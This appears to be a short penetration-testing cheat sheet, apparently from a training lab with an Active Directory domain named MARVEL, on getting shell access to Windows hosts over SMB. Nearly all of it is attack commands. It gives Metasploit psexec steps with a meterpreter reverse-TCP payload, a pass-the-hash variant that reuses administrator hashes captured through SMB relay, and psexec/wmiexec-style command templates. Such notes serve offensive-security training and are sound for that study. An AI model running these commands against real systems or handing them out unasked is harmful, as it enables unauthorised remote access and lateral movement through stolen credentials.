Gaining shell access using MS
Using password
# We want to look for exploit/windows/smb/psexec and use it
msf > search psexec
msf > use <number-of-exploit/windows/smb/psexec>
# Now we want to change the payload to a windows/x64 one
msf > set payload windows/x64/meterpreter/reverse_tcp
# Set the RHOST, SMBDomain=MARVEL, SMBUser, SMBPass
msf > set <mentioned-above> <value>
# Exploit!
msf > run
Using SAM hashes
The format of the hash in the SAM file is (LM:NT).
To utilize SAM hashes captured from the SMB Relay attacks:
# We want to look for exploit/windows/smb/psexec and use it
msf > search psexec
msf > use <number-of-exploit/windows/smb/psexec>
# Now we want to change the payload to a windows/x64 one
msf > set payload windows/x64/meterpreter/reverse_tcp
# Set SMBUser to administrator
msf > set SMBUser administrator
# Make sure to unset the SMBDomain
msf > unset SMBDomain
# Set SMBPass to the hash
msf > set SMBPass <admin-hash>
# Exploit!
msf > run
Gaining shell access using ps/wmi/
Using password
# Two ways to execute it
ps/wmi/ <domain-name>/<username>:"<password>"@<ip-address>
ps/wmi/ <domain-name>/<username>:@<ip-address>
Using SAM hash
ps/wmi/ administrator@<ip-address> -hashes <admin-hash>